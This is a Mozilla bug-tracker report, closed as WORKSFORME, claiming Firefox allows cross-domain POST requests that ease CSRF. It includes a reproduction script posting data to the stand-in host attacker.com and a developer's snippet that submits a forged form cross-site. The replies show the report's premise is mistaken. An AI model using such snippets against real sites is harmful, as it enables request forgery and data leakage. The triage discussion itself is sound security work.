573003 - Firefox allows cross-domain POST requests via JavaScript

Status: RESOLVED WORKSFORME

(Firefox :: Security, defect)

Description

[Thomas Konrad]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3

Firefox allows the submission of arbitrary POST requests domains different from the originating one. This makes it a lot easier to mount Cross-Site Request Forgery attacks. Imagine one of the following situations where a JavaScript, which performs a malicious action on a different site (such as posting something on Facebook), is embedded into a site:

- A malicious web site administrator embeds a malicious JavaScript into his site.
- An attacker can embed arbitrary JavaScript into a frequently visited site (such as via a Cross-Site Scripting vulnerability)

Other browsers don't allow for cross-domain POST requests (i tested IE 8, Opera 10.53 and Chrome 5).

Reproducible: Always

Steps to Reproduce:
The following script demonstrates the issue (embed it into a site different from attacker.com):

<script language="javascript">
	var fields = {'a' : 'b'};
	postToUrl('http://attacker.com', fields);

	function postToUrl(url, fields)
	{
		var http; try { var http = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { var http = new XMLHttpRequest(); }
	
		var params = '';
		for (var key in fields)
			params += key + '=' + fields[key] + '&';
	
		http.open('POST', url, true);
		http.send(params);
	}
</script>
Actual Results:  
The POST request is sent.

Expected Results:  
The POST request to domains different from the originating one should be denied.

Comment 2

[Daniel Veditz [:dveditz]]

I don't believe this is a duplicate of bug 246476, we should not be allowing cross-domain XHR without a CORS response from the host. But I'm a little confused by the example. CSRF posts would be pointing at a victim site, in which case we should be blocking it. The code points the post at "attacker.com" which presumably would implement the CORS headers, but then it's not a CSRF attack.

Of course malicious script can just create a form in the document DOM and submit it and bypass any cross-site XHR restrictions. If that's what you're talking about then this is a dupe of bug 246476, but then it should work identically in all major browsers.

Comment 3

[Jonas Sicking (:sicking) No longer reading bugmail consistently]

Indeed, the code above can be rewritten as:

inp = document.createElement("input");
form = document.createElement("form");
form.appendChild(inp);
inp.name = params;
form.action = url;
form.method = "POST";
document.body.appendChild(form);
form.submit();

that will work in all browsers.

If I'm misunderstanding something, please reopen the bug. We definitely want to fix this if there really is a problem here, but I'd prefer not to have security bugs just laying around.